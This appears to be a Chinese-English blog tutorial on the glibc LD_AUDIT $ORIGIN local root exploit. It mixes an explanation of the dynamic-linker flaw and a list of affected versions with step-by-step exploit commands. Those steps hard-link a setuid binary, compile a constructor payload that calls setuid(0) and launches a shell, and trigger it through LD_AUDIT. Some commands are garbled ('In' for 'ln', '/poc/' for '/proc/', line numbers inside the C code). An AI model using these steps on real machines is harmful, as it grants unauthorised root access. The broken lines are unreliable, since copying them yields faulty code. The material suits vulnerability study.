1. 名词解释
The GNU C Library: The GNU C Library project provides the core libraries for the GNU system and GNU/Linux systems, as well as many other systems that use Linux as the kernel(操作内核). These libraries provide critical APIs including ISO C11, POSIX.1-2008, BSD, OS-specific APIs and more. These APIs include such foundational facilities as open, read, write, malloc, printf, getaddrinfo, dlopen, pthread_create, crypt, login, exit and more.
The GNU C Library is designed to be a backwards compatible, portable, and high performance ISO C library. It aims to follow all relevant standards including ISO C11, POSIX.1-2008, and IEEE 754-2008.
2. 漏洞原理解释
For obvious reasons, the dynamic linker will ignore requests to preload user
specified libraries for setuid/setgid programs. However, it is possible to
imagine legitimate use cases for this functionality, so the glibc developers
provide an exception to this rule.
LD_PRELOAD
A whitespace-separated(空白符分割的) list of additional, user-specified, ELF(一种文件格式)
shared libraries to be loaded before all others.(即提前预加载) This can be
used to selectively override functions in other shared
libraries. For set-user-ID/set-group-ID ELF binaries, only
libraries in the standard search directories that are also set-
user-ID will be loaded.
In order to be preloaded during the execution of a privileged program, a
library must be setuid and in the trusted library search path. This is a
reasonable design, before a library will be loaded, the system administrator
must brand a library as safe to load across privilege boundaries.
This feature allows developers who design their programs to operate safely
while running as setuid to opt-in(选择加入) to doing so. Bizarrely, the same conditions
do not apply to LD_AUDIT(用户指定的、ELF 共享对象的列表,这些对象要在单独的链接器命名空间中的所有其他对象之前加载), which will load an arbitrary DSO, regardless of
whether it has been designed to operate safely or not.
While the dynamic loader will only use a library that exports the dynamic
symbols required by the rtld-auditing API(auditing API for the dynamic linker), it must first dlopen() the
library in order to examine the exported symbols. By definition, this must
execute any defined initialization routines.
This confusion can be exploited by locating a DSO in the trusted search path with
initialization code that has not been designed to operate safely while euid !=
uid. See the Notes section below for additional discussion on this topic.
--------------------
Affected Software
------------------------
At least the following versions have been tested
2.12.1, FC13
2.5, RHEL5-6 / CentOS5-6
2.11.1, Ubuntu 10
EDB Note: 2.7, Debian 5
一些名词解释:glibc 知:ld.so_canpool的博客-CSDN博客
3. 漏洞利用
mkdir /tmp/exploit
In /bin/ping /tmp/exploit/target //创建target文件硬链接
exec 3< /tmp/exploit/target //把target加载到内存中
ls -l /proc/$$/fd/3 //查看其在内存的情况
rm -rf /tmp/exploit/ //删除目录
ls -l /poc/$$/fd/3
cat > payload.c
1 void __attribute__((constructor)) init() 2 { 3 setuid(0); 4 system("/bin/bash"); 5 }
cat payload.c 如果内容有缺失或者错误,可以用vi payload.c命令启动vim进行修改。
gcc -w -fPIC -shared -o /tmp/exploit payload.c
ls -l /tmp/exploit
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
到此命令结束
浙公网安备 33010602011771号